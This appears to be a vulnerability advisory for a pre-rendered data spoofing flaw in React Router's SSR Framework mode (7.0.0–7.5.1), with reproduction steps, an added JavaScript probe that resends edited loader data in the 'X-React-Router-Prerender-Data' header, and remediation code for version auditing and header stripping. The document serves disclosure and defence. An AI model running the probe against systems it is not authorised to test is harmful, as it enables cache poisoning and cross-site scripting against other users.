React Router Pre-Rendered Data Spoofing Vulnerability

Vulnerability

A vulnerability in React Router's server-side rendering (SSR) Framework mode allows pre-rendered data to be spoofed. The issue affects versions 7.0.0 through 7.5.1. The 'X-React-Router-Prerender-Data' request header is used internally to hand pre-computed loader data to the server render, but affected versions also honor it on ordinary runtime requests: any client that adds the header can overwrite the values of the data object that is rendered into the HTML. The vulnerability requires that the route uses a loader, since the spoofed object replaces what that loader returns. Because the attacker-controlled values end up in the server's response, the flaw can lead to cache poisoning when a cache sits in front of the application, and to cross-site scripting (XSS) if the application renders loader data without escaping it on the client side.

Impact

Exploiting this vulnerability lets an attacker substitute their own values for the loader data in a server-rendered page, changing the content users see. The request itself is attacker-supplied, so the direct effect is limited to the response the attacker receives; the serious cases arise downstream. If a CDN or other cache stores the rendered HTML keyed by URL without regard to this header, the spoofed page is served to every subsequent visitor until the cache entry expires or is purged. If the application places loader data into the DOM unescaped (for example through dangerouslySetInnerHTML) or otherwise trusts it on the client, the spoofed values can carry script, turning the issue into cross-site scripting.

Reproduction

To reproduce, install React Router in Framework mode at a version between 7.0.0 and 7.5.1 and create a route whose module exports a loader function. Request the route with '.data' appended to its path; the response is the serialized loader data that the server would normally render. Edit that payload so that its structure is unchanged but one or more values are replaced, then request the page itself with the 'X-React-Router-Prerender-Data' header set to the edited payload. The rendered HTML reflects the replaced values rather than the loader's real output, which confirms the spoofing.
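The following is an added example that performs the reproduction steps above as a probe; it is not code from the React Router project or from the original advisory. The fetch implementation is injectable so the probe can be exercised offline against a simulated target. The simulated target, the loader value "Hello from the loader", the marker string, the simplified payload shape and the (absent) header encoding are assumptions for illustration.

```javascript
// Added example (not React Router project code): probe for the pre-rendered
// data spoofing behaviour. Assumed names: probePrerenderSpoofing, makeFakeTarget.

const SPOOF_HEADER = "X-React-Router-Prerender-Data";

// Fetch the route's serialised loader data from "<page>.data", replace one
// value the loader is known to return with a marker, and request the page
// again with the modified payload in the header. Returns true when the marker
// appears in the rendered HTML, i.e. the server trusted the header.
// `encodePayload` is a hook for targets that expect an encoded header value
// (assumption: the advisory text names no encoding, so the default is none).
async function probePrerenderSpoofing({
  pageUrl,
  knownValue,
  marker,
  fetchImpl = fetch,
  encodePayload = (s) => s,
}) {
  const dataRes = await fetchImpl(`${pageUrl}.data`);
  if (!dataRes.ok) throw new Error(`.data request failed with ${dataRes.status}`);
  const original = await dataRes.text();
  if (!original.includes(knownValue)) {
    throw new Error("knownValue not present in the .data payload; use a string the loader returns");
  }
  const spoofed = original.split(knownValue).join(marker);

  const pageRes = await fetchImpl(pageUrl, {
    headers: { [SPOOF_HEADER]: encodePayload(spoofed) },
  });
  const html = await pageRes.text();
  return html.includes(marker);
}

// Constructed stand-in for a target so the probe runs without a network.
// It answers "<page>.data" with a simplified loader payload and renders the
// page from either that payload or, when `patched` is false, from whatever the
// header carries, which is the faulty behaviour described above.
function makeFakeTarget({ patched }) {
  const loaderPayload = '["loaderData","routes/home","message","Hello from the loader"]';
  const render = (payload) => {
    const message = /"message","([^"]*)"/.exec(payload)?.[1] ?? "";
    return `<!DOCTYPE html><html><body><h1>${message}</h1></body></html>`;
  };
  return async (url, init = {}) => {
    const headerValue = init.headers ? init.headers[SPOOF_HEADER] : undefined;
    const body = url.endsWith(".data")
      ? loaderPayload
      : render(!patched && headerValue ? headerValue : loaderPayload);
    return { ok: true, status: 200, text: async () => body };
  };
}

// Against a real target, omit fetchImpl to use the global fetch:
//   probePrerenderSpoofing({ pageUrl: "https://app.example/home",
//                            knownValue: "a string your loader returns",
//                            marker: "spoof-7f3a" })
```

The probe treats the payload as an opaque string and only swaps a known loader value for a marker, so it does not depend on the exact serialisation format; if the marker shows up in the page, the server rendered the header instead of running the loader. Run it only against systems you are authorised to test.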

Remediation

Upgrade to React Router 7.5.2 or later, where this vulnerability has been patched. Until the upgrade is deployed, strip the 'X-React-Router-Prerender-Data' header from inbound requests at the reverse proxy or edge; legitimate clients never send it. Where a cache sits in front of the application, purge cached HTML for affected routes after patching, and review any component that renders loader data without escaping.
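As an added example (not React Router project code), the block below gives a version check for the affected range (7.0.0 up to and including 7.5.1) that can be run over the package.json of an installed react-router, together with a Connect/Express-style middleware that drops the header from inbound requests as a stopgap until the upgrade is deployed. The function names, the middleware signature and the sample package.json text are assumptions for illustration.

```javascript
// Added example (not React Router project code): affected-version audit and a
// header-stripping stopgap. Assumed names: isAffectedVersion,
// auditReactRouterPackage, stripPrerenderDataHeader.

const FIRST_AFFECTED = [7, 0, 0];
const FIRST_FIXED = [7, 5, 2];

// "7.5.1", "v7.5.1" or "7.5.2-pre.0" -> [7, 5, 1] etc. Prerelease tags are
// discarded, so a 7.5.2 prerelease reports as fixed; verify those by hand.
function parseVersion(version) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(version).trim());
  if (!m) throw new Error(`unrecognised version string: ${version}`);
  return m.slice(1, 4).map(Number);
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i += 1) {
    if (a[i] !== b[i]) return a[i] - b[i];
  }
  return 0;
}

// True for any release in [7.0.0, 7.5.2).
function isAffectedVersion(version) {
  const v = parseVersion(version);
  return compareVersions(v, FIRST_AFFECTED) >= 0 && compareVersions(v, FIRST_FIXED) < 0;
}

// Takes the text of node_modules/react-router/package.json and returns a
// small report. Reading the file is left to the caller so this stays pure.
function auditReactRouterPackage(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  if (pkg.name !== "react-router") {
    throw new Error(`expected package "react-router", found "${pkg.name}"`);
  }
  return { version: pkg.version, affected: isAffectedVersion(pkg.version) };
}

// Stopgap middleware: remove the header before the request reaches the React
// Router request handler. Browsers never send it, and the build-time prerender
// step invokes the handler directly rather than through this HTTP path
// (assumption about the deployment), so dropping it has no legitimate cost.
function stripPrerenderDataHeader(req, res, next) {
  // Node lowercases incoming header names.
  delete req.headers["x-react-router-prerender-data"];
  next();
}
```

For the audit, pass the file contents, for example fs.readFileSync("node_modules/react-router/package.json", "utf8"); check every copy in a monorepo, since nested node_modules can pin different versions. Mount the middleware ahead of the React Router handler (app.use(stripPrerenderDataHeader) in Express). The same effect at an nginx edge is proxy_set_header X-React-Router-Prerender-Data ""; which removes the header from proxied requests. Neither replaces the upgrade.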

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 0.6
exploitability: 7.6
remediation: 7.7
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.